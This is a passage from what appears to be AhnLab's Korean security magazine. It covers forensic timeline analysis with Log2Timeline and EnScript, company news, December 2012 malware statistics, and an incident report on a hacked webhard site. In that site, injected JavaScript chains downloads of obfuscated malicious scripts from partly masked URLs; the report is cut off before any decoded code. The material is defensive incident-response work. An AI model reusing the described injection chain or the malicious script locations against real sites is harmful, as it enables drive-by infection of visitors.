로워질 APC 어플라이언스 도입을 적극 고려하는 기업이 더욱 늘어날 것으로 전망된다”고 밝혔다.
[표 1] APC 어플라이언스 제품 사양
aPC appliance 2000P
aPC appliance 2000PR
aPC appliance 5000P
aPC appliance 5000PR
aPC appliance 10000PR
제품 외관 Cache
관리 user 수 2,000 2,000 5,000 5,000 10,000
Platform
OS linux Cent OS 5.8(64bit)
database ibm db2 workGroup Server
hardware
CPu dual Core dual Core Quad Core Quad Core Quad Core
memory 2G 2G 4G 4G 16G
hdd500Gb x 2ea
3.5", 7200rpm500Gb x 4ea
3.5", 7200rpm500Gb x 3ea
3.5", 7200rpm500Gb x 4ea
3.5", 7200rpm1Tb x 6ea
3.5", 7200rpm
Software admin aPC 4.0 기반 최신 admin
14
T E C h R E P O R T 디지털 타임라인
시간 정보의 집합체, 타임라인을 파헤치다
디지털 타임 포렌식_심화편
지난 <월간 안> 1월호를 통해 시간 정보에는 어떤 종류가 있는지, 어떤 작업을 거쳐야 확인할 수 있는지 살펴보았다. 이를 통해 포렌
식 분석에서 시간 정보가 얼마나 중요한 지 재확인할 수 있었다. 이번에는 디지털 시간 정보의 집합체인 ‘타임라인(Timeline)’을 어떻
게 효과적으로 활용할 수 있는지 알아보는 한편, 최근 새로 고안된 타임라인 기법을 소개하고자 한다.
시간 정보의 집합체, 타임라인이란
우선 타임라인의 정의부터 살펴보자. ‘Timeline’의 사전적 의미는 연
대표 혹은 시각표를 뜻한다. 또 ‘Time-line’의 경우 분•초까지 정밀하
게 예정된 시각표를 의미한다.
굳이 사전을 뒤지지 않고도 우리 주변에서 쉽게 타임라인이 뜻하는 바
를 유추할 수 있다. 영화나 드라마 중 수사물의 경우 시간대별 추적을
진행하곤 한다. 이처럼 발생한 사건을 시간 순서대로 나열한 뒤 ‘시간
사용자’들의 행위를 역추적하는 방식을 흔히 타임라인이라 부른다.
이와 마찬가지로, 컴퓨터를 분석할 때에도 타임라인 기법이 쓰인다.
컴퓨터가 어떤 동작을 했으며 어떤 기록을 남겼는지에 대한 정보들을
시간 순서에 따라 정리하는 것이다. (물론 사전에 삭제된 정보는 남아
있지 않아 정리가 어려운 경우도 있다.)
만약 최신 업데이트된 윈도우7 하에서 웹을 통해 악성코드를 다운로
드하고 실행했다면, 웹 브라우저의 히스토리엔 해당 웹 페이지에 방문
한 시간과 악성코드가 담긴 파일을 다운로드한 시간이 남는다. 이를 통
해 악성코드가 실행된 시간과 해당 파일이 컴파일된 시간 등을 추적할
수 있다. 또 서비스로 등록되는 악성코드의 경우 이벤트로그나 레지스
트리를 통해 언제 서비스로 등록됐는지 확인이 가능하다.
이처럼 악성코드나 악의적인 컴퓨터 사용자의 행위 분석 등을 한눈에
파악하기 위해서는 타임라인 분석이 효과적이다. 그렇다면 타임라인
을 생성하기 위한 가장 간편한 방법은 무엇일까.
먼저 시간 정보를 포함한 데이터를 일괄 수집한 후 분석에 필요한 데
이터를 뽑아내고, 이를 시간 순서대로 정렬해야 한다. 이 같이 집계된
타임라인 자료를 토대로 분석가는 다음과 같은 분석작업을 수행할 수
있다.
(1) 이벤트가 발생한 경우 해당 사건이 발생한 시간에 컴퓨터가 어
떻게 처리했는지 확인한다.
(2) 전체 데이터 중 의심이 가는 데이터는 추출하거나 카빙(Carving)
해 악성코드 분석 및 포맷 분석을 진행한다.
(3) 사건과 의미있는 데이터를 비교해 행위 분석을 진행하고 사건에
대한 타임라인을 새롭게 구성한다.
(4) 사건과 관련한 용의자들의 행동 반경을 좁히거나 용의자가 많을
시 용의자 인원을 압축한다.
[그림 1] 컴퓨터에서 생성한 타임라인 결과물
15
타임라인 생성 도구 ‘Log2Timeline’
이렇듯 포렌식에 유용한 타임라인 기법을 사용하기 위해서는 꼭 필요
한 도구가 있다. 바로 타임라인 분석 프로그램인 ‘Log2Timeline’이다.
이 프로그램은 다양한 파일의 시간 정보를 파싱(Parsing)해 하나의 타
임라인을 만들어주는 프로그램으로 곳곳에 흩어진 여러 시간 정보를
한번에 확인할 수 있도록 도와준다. 분석가들에게는 더없이 요긴한 프
로그램이다. 특히 Log2Timeline은 펄(Perl)로 작성돼 있어 여러 운영
체제에서 사용할 수 있다는 장점이 있다. 게다가 아래 [표 1]과 같이
다양한 파일에서 시간 정보를 추출할 수도 있다.
• Log2Timeline을 다운로드 받을 수 있는 주소: http://log2timeline.net/
Name Description
altirisParse the content of an xexaminventory or aexProcesslist log file
analog_cache Parse the content of an analog cache file
apache2_access Parse the content of a apache2 access log file
apache2_error Parse the content of a apache2 error log file
chrome Parse the content of a Chrome history file
encase_dirlistingParse the content of a CSV file that is exported from FTK imager (dirlisting)
evtParse the content of a windows 2k/xP/2k3 Event log
evtxParse the content of a windows Event log File (EVTx)
exifExtract metadata information from files using ExifTool
ff_bookmark Parse the content of a Firefox bookmark file
ff_cacheParse the content of a Firefox _CaChE_00[123]_ file
firefox2 Parse the content of a Firefox 2 browser history
firefox3 Parse the content of a Firefox 3 history file
ftk_dirlistingParse the content of a CSV file that is exported from FTK imager (dirlisting)
generic_linuxParse content of Generic linux logs that start with mmm dd hh:mm:SS
iehistoryParse the content of an index.dat file containg iE history
iis Parse the content of a iiS w3C log file
isatxt Parse the content of a iSa text export log file
jp_ntfs_changeParse the content of a CSV output file from JP (NTFS Change log)
l2t_csvParse the content of a body file in the l2t CSV format
ls_quarantineParse the content of a lSQuarantineEvents database
mactimeParse the content of a body file in the mactime format
mcafeeParse the content of log files from mcafee aV engine
mcafeefireupParse the content of an xexaminventory or aexProcesslist log file
mcafeehelParse the content of a mcafee hiPS event.log file
mcafeehs Parse the content of a mcafee hiPShield log file
mft Parse the content of a NTFS mFT file
mssql_errlogParse the content of an ERRORlOG file produced by mS SQl server
ntuser Parses the NTuSER.daT registry file
[표 1] Log2Timeline이 파싱할 수 있는 파일과 상세 설명
openvpn Parse the content of an openVPN log file
operaParse the content of an Opera's global history file
oxmlParse the content of an Openxml document (Office 2007 documents)
pdfParse some of the available PdF document metadata
prefetch Parse the content of the Prefetch directory
proftpd_xferlog Parse the content of a ProFTPd xferlog log file
recycler Parse the content of the recycle bin directory
restore Parse the content of the restore point directory
safari Parse the contents of a Safari history.plist file
sam Parses the Sam registry file
security Parses the SECuRiTy registry file
selinux Parse the contents of a Safari history.plist file
setupapiParse the content of the SetupaPi log file in windows xP
skype_sql Parse the content of a Skype database
software Parses the SOFTwaRE registry file
solParse the content of a .sol (lSO) or a Flash cookie file
squidParse the content of a Squid access log (http_emulate off)
symantec Parse the content of a Symantec log file
syslog Parse the content of a linux Syslog log file
system Parses the SySTEm registry file
tlnParse the content of a body file in the TlN format
urlsnarf Parse the content of an uRlSnarf log file
utmpParse the content of linux wtmp/wtmpx/btmp files
volatilityParse the content of a Volatility output files (psscan2,sockscan2…)
win_linkParse the content of a windows shortcut file (or a link file)
wmiprov Parse the content of the wmiprov log file
xpfirewall Parse the content of a xP Firewall log
Log2Timeline을 활용하면 [표 2]와 같이 시간과 각종 정보가 고스란히
담긴 칼럼(Column)을 볼 수도 있다.
Column Description
date 이벤트가 발생한 날짜(mm/dd/yyyy)
Time 이벤트가 발생한 시간(hh:mm:SS)
Timezone 타임라인을 생성할 때 선택한 타임존
maCb
m:modification, a:access, C:Change, b:birth라
는 의미를 가지고 있다.(C는 생성이 아닌 변경(메타데이
터 수정)을 의미하고 b는 birth로 흔히 이야기하는 생
성 시간을 의미한다.)
Source파싱을 진행한 원본 파일의 종류를 가리킨다. lOG,
wEbhiST, REG, File 등을 말한다.
Sourcetype파싱을 진행한 원본 파일의 종류를 좀 더 세심하게 표현
해준다. Shortcut lNK, wmiprov log file, SySTEm key, NTFS $mFT 등을 말한다.
Type어떤 시간이 변경되었는지 자세히 표현해준다. ExE Timestamp, $Si [maCb] Time, access, last written 등이 있다.
16
타임라인 생성 선행 과정…데이터 추출
‘시작이 반이다’라는 말이 있듯, Log2Timeline을 잘 활용하면 타임라
인 생성은 다한 것이나 다름없다. 하지만 Log2Timeline을 제대로 사
용하기 위해선 사전에 거쳐야 할 단계가 있다. Log2Timeline은 여러
데이터에 대한 포맷 비교 과정을 거쳐 해석이 가능하다고 여겨지는
데이터를 결과값에 추가하는 식으로 동작한다. 이로 인해 다수의 파일
에 접근해 일일이 대조•비교하는 과정을 거치고 많은 시간을 낭비하
는 한계가 있는 것이다.
때문에 시간 낭비를 줄이기 위해서는 원하는 데이터만 추출해서
Log2Timeline 단계에 진입해야 한다. 여기서 나온 선행 단계가 바로
운영체제 아티팩트(artifact) 모으기다. 운영체제 아티팩트를 통해 원
하는 데이터만 수집하는 방법은 아래의 두 가지 방법이 있다.
도구를 추가할 때 사용하는 언어는 EnScript이며 문법은 C++와 비슷
해, C 코드에 익숙한 분석가들은 누구든지 쉽게 사용할 수 있다. 아래
코드처럼 이름을 구분해 데이터를 추출할 수 있으며 확장자나 폴더를
확인해 데이터를 추출할 수도 있다.
기본적인 문법과 예문은 EnScript Help에서 확인이 가능하다.
[그림 3] EnScript Help 창
[그림 4] 아티팩트를 모으는 EnScript 실행 화면
위의 [그림 3]과 같이 EnCase는 사용자가 만든 도구를 실행하면 필요
한 데이터를 체크해 수집할 수 있다. 수집된 내역은 윈도우에서 기록
한 시간 정보 데이터를 기초로 한다.
도구가 완전히 수행되고 나면 체크한 항목들에 대한 값은 [그림 4]와
같이 작성자가 지정한 폴더에 저장된다.
user 시스템 사용자가 저장된다.
host 시스템에 기입된 host 명이 저장된다.
Short 각각의 Entry에 대한 짧은 설명이 명시된다.
desc Short의 정보보다 좀 더 다양한 정보가 저장된다.
VersionTimestamp object의 버전 정보가 명시된다. 현재는
Version 2이다.
Filename 파일에 대한 전체 경로가 저장된다.
inode 파싱된 파일의 inode가 저장된다.
Notes 모듈에서 더 많은 정보를 표현하고 싶을 때 사용한다.
Formatlog2Timline이 사용하는 모듈에 대한 정보를 표현해
준다. log2t::input::mft 와 같은 방식으로 표현된다.
extra 모듈에서 더 많은 정보를 표현하고 싶을 때 사용한다.
[표 2] Log2Timeline에서 생성하는 칼럼
(1) 디스크 이미지 파일을 마운트한 뒤 스크립트를 작성해 원하는
데이터만 수집한다.
(1)-a. 이미지 파일을 마운트할 수 있는 도구를 사용해 마운트를 진
행한다.
OSFmount: http://www.osforensics.com/tools/mount-disk-
images.html
MountImagePro: http://www.mountimage.com
(1)-b. 스크립트를 사용해 데이터를 수집한다.
(2) 포렌식 도구를 활용해 이미지에서 직접 익스포트(Export) 한다.
(2)-a. Evidance를 생성한 뒤 이미지를 마운트한다.
EnCase: http://www.guidancesoftware.com/encase-forensic.
htm
FTK: http://www.assessdata.com/products/digital-forensics/
ftk
X-Ways Forensics: http://www.x-ways.net/forensics/
(2)-b. 필요한 데이터를 체크, 폴더 구조를 포함해 익스포트한다.
운영체제 아티팩트 모으기
운영체제에 대한 아티팩트를 모으는 데에는 또 다른 도구와 스크립트
가 필요하다. 여기에서 포렌식 도구인 EnCase라는 제품이 사용된다.
이 제품은 파일 복구 디스크 탐식 등 본래 구현이 가능한 기능은 물
론, 사용자가 자체 제작한 도구를 계속 추가할 수 있는 ‘다용도’ 기능
도 지니고 있다.
(1) if (entry.Name() == "$MFT") { //파일명으로 파일 확인
afirst.DPRINTF(entry.ItemPath()); //콘솔에 출력
afirst.MakeFolder(entry, conn, outPath + entry.Parent().
FullPath()); //폴더 생성
String name = outPath + entry.Parent().FullPath() + "\\" +
entry.Name(); //파일 경로 입력
afirst.MakeArt(entry, opts, ef, lf, name);
//입력된 파일 추출
}
[그림 2] 아티팩트를 모으는 EnScript의 코드 부분
17
[그림 5] 아티팩트들이 저장되는 공간
[그림 7] 정렬 방식의 변경
[그림 8] 새롭게 만든 정렬 도구인 log2_sort.py
[그림 9] log2_sort.py로 정렬된 결과
Log2Timeline 도구를 사용하는 방법은 기존과 다르지 않다. [그림 6]은
타임라인을 생성하는 데 사용하는 명령어들이다.
위의 [그림 7]과 같이 기존에는 추출한 타임라인을 엑셀에 적용할 시 날
짜와 시간이 양분됐으나 새 도구(log2_sort.py)는 이 문제를 말끔히 해
결했다. 더구나 데이터 정렬 과정에서 발생하는 데이터 유실도 방지할
수 있다.
실제 기존 정렬 프로그램을 적용해보면 데이터 유실 등의 문제는 더 분
명히 드러난다. 기존 정렬 프로그램을 사용할 경우 아래 [그림 9]처럼 데
이터가 유실되고 타임라인의 크기도 줄었으나, 새 방식을 적용할 경우
엔 데이터가 그대로 유지됐다.
엑셀에 호환 가능한 타임라인 정렬
타임라인을 생성하는 것 못지 않게 타임라인을 보기 편하게 정렬하는
것도 중요하다. 쉽고 빠른 데이터 분석의 기본은 역시 정렬이기 때문
이다. 이에 대해서도 기존 방식에서 다소 진화된 버전을 소개하고자
한다.
기존 방식은 두 개의 칼럼(날짜/시간)을 사용해 타임라인을 정리했다.
하지만 이는 엑셀에서 제공하는 정렬 방식이 적용되지 않아 불편함을
초래했다. 이를 해결하기 위해 별도의 도구를 개발, 적용했다. 이 방식
을 사용하면 두 개의 칼럼([그림 7] 참조)이 하나로 합쳐져 ‘월/날짜/년
도 시간:분:초(MM/DD/YYYY HH:MM:SS)’ 방식으로 나열됐던 것이
년도/월/날짜 시간:분:초(YYYY-MM-DD HH:MM:SS)’로 변경된다.
이 도구는 기타 다른 정렬 프로그램에도 호환이 가능하다.
새로운 방법으로 타임라인 생성하기
운영체제 아티팩트 모으기 등을 통해 데이터 추출을 마쳤다면 이제
Log2Timeline을 사용해 본격적으로 타임라인을 생성할 순서다. 여기
서 중요한 팁을 제안하고자 한다. Log2Timeline을 이용해 타임라인
을 생성하는 기존의 방법을 보완해 좀 더 빠르고 정확한 분석이 가능
한 방법을 제시하고자 하는 것이다.
그동안 분석가들은 타임라인을 생성하기 위해 VM웨어(VMware)를
설치하고 그 안에서 우분트(Ubuntu)를 동작시켜 Log2Timeline을 사
용해왔다. 하지만 이 방식은 시간이 오래 걸릴 뿐만 아니라, 대용량 데
이터 분석에 다소 어려움이 있으며 효율성 면에서도 아쉬움이 있었다.
이에 필자는 VM웨어를 통하는 방식이 아닌, 로컬 아닌 윈도우 안에서
타임라인을 동작시킬 수 있는 방법을 찾아냈다.
이를 위해 필자는 갖가지 방법을 총동원해 프로그램 소스를 수정하는
등의 과정을 거쳤다. 특히 기존에 해왔던 방식의 경우 한글을 파싱하
는 데에 어려움이 컸다는 점을 감안, 여러 차례 테스트를 거쳐 한글을
제대로 파싱할 수 있는 방법을 도출했다. 아래는 주요 수정사항이다.
(1) 인코딩 부분을 utf-8로 변환해 인식하도록 변경
(2) 파일 포맷을 비교하는 부분에서 파일 기본 경로 비교 추가
C:\strawberry>perl log2timeline -r -p -z Asia/Seoul –w C:\
Output\Timeline c:\timeline\ms-drt\
Start processing file/dir [c:\timeline\ms-drt\] ...
Starting to parse using input modules(s): [all]
[PreProcessing] Unable to retr ieve information from
Log2t::PreProc::user_browser
[PreProcessing] Unable to retr ieve information from
Log2t::PreProc::win_sysinfo
Loading output module: csv
mft file name c:\timeline\ms-drt\\C\$MFT
Run time of the tool: 583 seconds
C:\strawberry>[그림 6] 윈도우에서 타임라인 생성
18
대용량 분석이 가능한 타임라인 뷰어
다각도의 방법을 강구해 타임라인을 생성해도 분석하는 과정에서 또 다
른 난제를 만날 수 있다. 이에 분석가들이 흔히 겪을 수 있는 몇 가지 어
려움에 대해 대안책을 제시하고자 한다. 먼저 CSV로 만들어진 파일을
엑셀로 불러왔을 때 확인할 수 있는 행수가 제한돼 있는 문제에 대한 해
결책이다.
[그림 10] log2_sort.py의 기능
[그림 11] 제한된 엑셀 행수를 조정하여 결과물 생성
분할된 타임라인 파일들은 엑셀의 104만여 개(엑셀 2007 이상)의 라
인 수에 맞게 잘려, 엑셀에서도 이상 없이 읽을 수 있다. 하지만 이 방
식도 약간의 한계는 있다. PC의 하드디스크가 커지면 타임라인의 크
기도 커지기 때문에 대용량에 맞는 ‘대용량 로그 뷰어’가 필요한 것이
다. 이를 해결하기 위해 대용량 로그 뷰어인 스플렁크(Splunk)와 같
은 제품을 사용하길 권한다. 스플렁크를 사용해 대용량 타임라인을
확인하는 방법은 아래에 적힌 주소와 [그림 12]를 참조하면 된다.
[그림 12] 스플렁크를 통한 타임라인 검색
Version 행수 열수 전체 셀수
엑셀 2003 65,536 256 16,777,216
엑셀 2007 이상
1,048,576 16,384 17,179,869,184
[표 3] 엑셀(Excel)의 제한 행과 열 그리고 전체 셀수
[표 3]에서 정리한 바와 같이 엑셀의 행수와 열수 등은 제한이 있다. 이
는 곧 타임라인을 엑셀에서 불러올 경우 제한 행수 이상 확인이 어렵다
는 이야기다. 타임라인을 엑셀에 맞게 잘라줘야 할 필요성이 제기되는
이유다.
이 같은 문제는 앞서 소개한 바 있는 엑셀 정렬 도구인 log2_sort.py
로 해결이 가능하다. log2_sort.py는 기존의 정렬 프로그램들과 달리,
Date와 Time 칼럼을 합치고 라인의 수에 따라 나누어 주는 기능이 있
어 편리하다.
이 도구를 사용해서 타임라인 정렬을 시도하면 아래 [그림 11]과 같이
라인 수에 맞게 파일이 자동 분할돼 정렬되는 것을 확인할 수 있다.
참조 :
http://forensicinsight.org/wp-content/uploads/2012/05/
INSIGHT_SuperTimeline+Splunk.pdf
대용량 타임라인 협업 분석
PC의 하드디스크 크기가 커지면서 사용자가 사용할 수 있는 공간도
넓어졌다. 이는 사용자가 남기는 흔적 역시 장시간 보관될 수 있다는
의미이기도 하다. 장시간 보관된 로그와 시스템은 굉장히 넓은 범위의
타임라인을 형성한다.
또 하나의 디스크가 아닌, 다량의 디스크를 분석하게 되는 경우에도
분석해야 할 타임라인의 개수가 크게 늘어난다. 이 같은 문제는 타임
라인의 시각화 기법을 통해 해결할 수 있다. 분석가들은 흔히 타임라
인을 시각적으로 확인해 주는 도구를 사용하곤 하는데, 이를 통해 어
느 시스템에서 어떤 이벤트가 발생했는지 한눈에 파악할 수 있다.
아래 [그림 13]의 도구는 MIT에서 시작한 SIMILE Project다. Google
Docs와 연동해 타임라인을 작성하는 방식이다. 이 방식은 여러 분석
가들이 참여해 특정 이슈를 빨리 발견하고 이에 대한 리포트를 즉각
적으로 작성하는 데에 도움을 준다.
다양한 분석 패턴
분석을 진행할 때 가장 중요한 것은 사전 인터뷰다. 사전 인터뷰를 통
해 시스템의 이상 징후와 의심 침해 등을 판단해야 한다. 분석가는 인
터뷰 내용을 기초로 다양한 패턴을 생성하며 검색을 진행하게 된다.
검색에 사용하는 패턴은 ‘정규 표현식’과 다양한 ‘인코딩 방식’이 있다.
참조 :
http://briancroxall.net/TimelineTutorial/TimelineTutorial.html
http://www.simile-widgets.org/timeline/
[그림 13] 타임라인 생성 도구 SIMILE Project
19
또 이벤트 발생 시간에 대한 정보가 제공됐을 시엔 다양한 시간 인코
딩 방법을 고려해 검색을 진행해야 한다.
참조 :
http://forensicinsight.org/wp-content/uploads/2012/10/
INSIGHT-Digital-Times.pdf
http://maxhack.tistory.com/m/post/view/id/6
[그림 14] 포렌식 도구의 검색 방식
해커들은 기존에 만들어 놓은 공격 도구를 지속적으로 수정하며 공격
을 진행하곤 한다. 때문에 이를 바탕으로 만들어진 분석 패턴은 다른
악성코드와 기업 해킹 사고에 반복 적용이 가능하다는 이점이 있다.
특히 여러 사고에 대한 대응을 통해 만들어진 패턴들의 경우 데이터
베이스나 텍스트 형태로 저장해두면 미래에 발생할 사건에 대해서도
어느 정도 대비할 수 있어 요긴하다.
a h N l a b N E w S
20
파트너 인증 어워드
안랩 채널엔지니어인증평가(ACSA) 시상식 개최
‘인증된’ 파트너 “고품격 고객지원은 우리 손에 달렸다”
▲‘안랩 채널엔지니어인증평가(ACSA)’에 합격한 파트너 엔지니어들과 안랩 관계자들이 행
사 직후, 기념 촬영을 하고 있다.
‘2012 안랩 채널엔지니어인증평가(AhnLab Certified Security Architect, 이하 ACSA) 시상 및 수여식’이 지난 1월 14일 경기도 안랩 사옥
에서 성황리에 개최됐다.
안랩(대표 김홍선, www.ahnlab.com)은 고객 지원 품질 향상 등을 위해 ACSA 제도를 도입, 지난해 12월 11일 첫 인증평가를 실시했다. 이
결과, 전체 응시자의 절반 가까이(45.2%)가 합격해 이날 시상 및 자격증 수여식을 갖게 됐다.
이번 ACSA를 통해서는 Professional 레벨(5명)과 Qualified 레벨(14명)의 합격자가 각각 배출됐으며 이들 모두에게 자격증이 수여됐다. 최
고점자인 ‘장원’은 윤정웅 닷넷소프트 과장이 차지했으며 장원에
게는 20만 원의 상금이 전달됐다.
앞서 안랩은 검증된 엔지니어를 통해 고객지원 품질을 향상시
키고 파트너사들과의 공동 성장을 꾀하고자, 지난해 말 ACSA를
처음 도입했다.
ACSA는 문제은행 준비 및 검수 등 6개월 가량의 준비기간을 거
쳐 실시됐으며 평가과목은 악성코드(필수)를 비롯해 APC 계열
(선택), AOS-Mobile-T/S엔진(선택), TrusLine(선택) 등이 채택됐
다.
임영선 안랩 보안서비스본부장은 행사에서 “안랩은 파트너와 함
께 성장하고자 한다. 상호 윈윈(Win-Win)할 수 있도록 지원을
아끼지 않겠다”며 “앞으로 ACSA가 안정적으로 시행되도록 최선
을 다하겠다”고 밝혔다.
한편 안랩은 ACSA를 연 2회로 정례화할 계획이며 2013년 첫
평가는 오는 4월 실시할 예정이다.
a h N l a b N E w Sa h N l a b N E w S
21
안랩, 스마트폰 보안 특허 3종 획득
안랩은 최근 스마트폰 관련 보안기술 특허 3종을 획득했다.
특허 기술 명은 ▲안전한 애플리케이션 실행을 위한 가상화 장치,
서버 및 방법 ▲휴대 단말에서의 애플리케이션 삭제 방지 방법 및
장치와 그 방법을 실행하기 위한 프로그램이 기록된 기록 매체 ▲업
데이트 장치 및 방법이다.
안랩은 특허를 받은 이 기술들을 기업 내 구성원이 사용하는 모바
일 기기 통합 관리 솔루션인 ‘안랩 모바일 센터(AhnLab Mobile
Center)’와 ‘V3 모바일’ 등에 적용할 예정이다.
‘안전한 애플리케이션 실행을 위한 가상화 장치, 서버 및 방법’은 스
마트폰에서 사용하는 금융 관련 애플리케이션(이하 앱)이나 중요한
개인정보를 포함한 앱과 같이 보안이 필수인 앱을 악성코드로부터
보호해주는 것이 특징이다.
이 기술은 보안이 필요한 특정 앱의 정보를 온라인을 통해 원격지에
위치한 가상화 서버로 전송한다. 이후 가상 서버에서 사용자의 스마
트폰과 동일한 가상 환경에 해당 앱을 설치 및 실행한 후 그 실행 결
과값만을 다시 사용자의 스마트폰에 표시한다. 이로 인해 스마트폰
에 존재할 수 있는 악성코드가 앱에 접근하는 것을 막을 수 있으며
사용자는 별도의 절차나 불편 없이 앱을 사용할 수 있다.
‘휴대 단말에서의 애플리케이션 삭제 방지 방법 및 장치와 그 방법
을 실행하기 위한 프로그램이 기록된 기록 매체’는 스마트폰 앱의
임의 삭제를 방지하기 위한 기술이다.
이 기술은 사용자가 임의로 앱을 삭제하기 위해 등록 해제를 시도할
경우 등록 해제 요청 화면을 최상위 화면으로 보여주거나, 등록 해
제 문의 메뉴를 등록 해제 차단용 화면에 숨기는 기법으로 중요 앱
의 삭제를 위한 사용자 인터페이스의 접근을 원천 차단한다. 이를
통해 기기 관리자에 등록된 앱이 사용자에 의해 임의적으로 삭제되
는 것을 막을 수 있다.
‘업데이트 장치 및 방법’은 Java 환경에서 파일 업데이트를 더욱 효
율적으로 하게 하는 기술이다. 기존의 방법으로 ‘V3 모바일’ 앱의 실
행코드와 관련된 엔진을 업데이트할 경우 해당 앱의 재설치가 불가
피했다. 하지만 이 기술은 업데이트 과정에서 특정 앱과 업데이트가
필요한 파일 사이의 중간자 역할을 하는 인터페이스 라이브러리를
제공해 앱의 기능이 중단되거나 앱 자체를 재설치하는 등의 불편함
없이 업데이트를 할 수 있게 도와준다.
조시행 안랩 전무는 “안드로이드 운영체제를 사용하는 스마트기기
가 증가하고 기업 업무에 활용하는 사례도 점점 많아짐에 따라 보안
과 편의성이라는 두 가지 요소가 모두 중요하게 됐다”며 “안랩은 모
바일 보안을 주도하는 기업으로서 축적된 기술을 바탕으로 강력한
보안과 사용자 편의성을 모두 제공해 나가겠다”라고 강조했다.
한편 안랩은 현재까지 누적 특허 121건으로 국내 보안 소프트웨어
업계 중 최고 기록을 보유하고 있다. 또한 안랩은 해외 PCT 국제 출
원 53건, 국가 별 출원 21건 등 국내뿐 아니라 해외에서도 세계적인
소프트웨어 기업들과 어깨를 나란히 하고 있다.
▲ 안랩 V3 모바일 2.0(AhnLab V3 Mobile 2.0)
22
a h N l a b N E w Sa h N l a b N E w S
APT 대응, 차세대 원격관제 서비스가 답
안랩은 최근 APT(Advanced Persistent Threat, 고도화된 지능형 타
깃 위협)에 효과적으로 대응할 ‘차세대 원격관제 서비스’를 출시했다.
안랩의 차세대 원격관제 서비스는 기존 탐지•대응의 기술적 한계를 극
복함으로써 APT 공격, 탐지 우회, 알려지지 않은 공격 등 지능적 공격
을 원격으로 모니터링해 신속히 대응한다. 기존 원격관제와 비교해 모
니터링하는 범위가 더 확대됐으며 탐지•분석 기술도 진일보했다.
기존 원격관제는 네트워크 보안에 초점을 맞춰 주로 방화벽,
IDS(Intrusion Detection System, 침입탐지시스템), IPS(Intrusion
Protection System, 침입방지시스템) 등을 모니터링했다. 차세대 원
격관제는 이에 더해 주요 서버와 엔드포인트 PC의 패킷, 트래픽, 악성
코드까지 모니터링한다.
안랩은 이 서비스를 위해 자체 기술로 서비스 전용 장비인 ‘세피니티
블랙박스(AhnLab Sefinity Black Box)’를 별도 개발했다. ‘세피니티
블랙박스’는 악성코드 다운로드 모니터링, 시스템 정보 수집, 패킷 모
니터링, 플로우(flow) 분석 등의 기능을 제공한다. 이는 외진 골목마다
CCTV를 설치한 것과 같아서 네트워크 보안 장비를 우회하는 APT 공
격에 입체적이고 완벽하게 대처할 수 있다.
이에 따라 안랩 차세대 원격관제 서비스는 APT 공격의 시도, 내부 침
투 성공, 악성코드 확산, 정보 유출 등 각 단계를 정교하게 모니티링해
정보 유출을 막아낸다.
안랩은 올해 상반기 중에 APT 공격 시나리오 대응 체계를 수립할
계획이다. 공격이 벌어지는 상황별 시나리오를 작성해 미리 대비하
고, 새로운 공격 내용을 수시로 반영해 보완해 나갈 방침이다. 향후
발견되는 새로운 유형의 APT 공격이나 진화된 공격 기법에 대한 탐
지•대응 능력을 지속적으로 강화하기 위해서다.
김홍선 안랩 대표는 “지난해 파견관제 분야에 이어 올해 원격관제
분야에서 새로운 패러다임을 제시함으로써 또 한번 리더십을 증명
하게 됐다”며 “앞으로도 양적 성장 못지않게 독보적 원천 기술을 바
탕으로 서비스의 질적 향상을 주도해 나가겠다”고 말했다.
[그림 1] 안랩의 차세대 원격관제 서비스 개념도
22
23
보안 통계와 이슈 S T a T i S T i C S
12월 악성코드, 전월 대비 3만 8천여 건 감소
ASEC이 집계한 바에 따르면, 2012년 12월에 감염이 보고된 악성코드
는 전체 993만 8154건이었다. 이는 전월인 11월의 997만 6829건에
비해 3만 8675건이 감소한 수치다.
악성코드를 유형별로 살펴보면, 트로이목마(Trojan)가 43.2%로 가장
높은 비율을 나타냈다. 스크립트(Script)는 8.8%, 웜(Worm)은 6.3%로
각각 집계됐다. [그림 2]는 2012년 12월, 1개월 동안 안랩으로 보고된
악성코드 감염을 유형별로 집계한 결과다.
악성코드 유형별 감염 비율을 지난 11월과 비교하면 [그림 3]과 같다.
트로이목마, 드롭퍼, 스파이웨어, 다운로더가 전월에 비해 증가세를 보
였고 웜, 스크립트, 애드웨어는 감소했다. 바이러스 계열은 전월 수준
을 유지했다.
[그림 2] 2012년 12월 악성코드 유형별 감염 비율
[그림 4] 신종 악성코드 유형별 분포
안랩 시큐리티대응센터(ASEC)는 ASEC Report Vol.36을 통해 2012년 12월의 보안 통계 및 이슈를 전했다. 지난 연말에 발생한 주
요 보안 이슈를 살펴본다.
12월 최다 신종 악성코드 ‘온라인 게임 핵’ ASEC, 12월 통계 및 보안이슈 발표
[그림 1] 월별 악성코드 감염 보고 건수 변화 추이[그림 3] 2012년 11월 vs. 12월 악성코드 유형별 비율
12월 최다 신종 악성코드는 ‘온라인 게임 핵’
1 1 월에 신규로 접수된 악성코드 중 감염 보고가 가장 많
았던 2 0건을 살펴본 결과 온라인 게임 핵인 W i n -Tr o j a n /
Onlinegamehack.104448.BM이 21만 6167건으로 전체의 29.2%를
차지했다. 스파이웨어인 Win-Spyware/PbBot.2000384는 6만 3899
건이 보고돼 8.6%를 차지했다. 신종 악성코드 역시 트로이목마가 70%
로 가장 많았다. 애드웨어와 스파이웨어는 각각 8%, 드롭퍼는 6%로
집계됐다.
24
2012년 12월 주요 보안 이슈
■국내서 Win32/ Induc에 감염된 Banki 발견
2012년 12월 말, Delphi로 제작된 Win32/Induc에 감염된 온라인
뱅킹 트로이목마가 국내 웹하드 사이트 해킹을 통해 유포된 사례가
발견됐다.
• 웹하드 사이트 : http://www.****hard.co.kr/common/JS/action2.js
action2.js
파일의 내부에는 아래와 같이 자바(Java) 스크립트 코드가 삽입돼 있
었고 국내 UCC 동영상 관련 사이트로부터 cp.js 파일을 다운로드하
도록 돼 있었다.
• UCC동영상 사이트 : http://ucc.******.co.kr/adsi/cp.js
cp.js파일에 저장된 코드는 아래와 같으며 특정 게임 사이트에서 또
다른 악성 스크립트를 다운로드하도록 돼 있다.
adsi.html 역시 동일한 사이트에서 index.html 파일을 다운로드하
며, 해당 스크립트는 아래 그림처럼 공다팩(Gongda Pack)으로 난독
화돼 있었다.
• UCC동영상 사이트 : http://ucc.******.co.kr/adsi/index.html
위 [그림 5]에서 처럼 index.html은 공다팩 툴킷으로 난독화돼 있다.
국내의 해킹된 사이트를 통해서 유포된 악성 스크립트의 대부분은
해당 툴킷에 의해 난독화돼 있다.
난독화된 index.html파일을 풀어보면 아래처럼 우리가 흔히 사용하
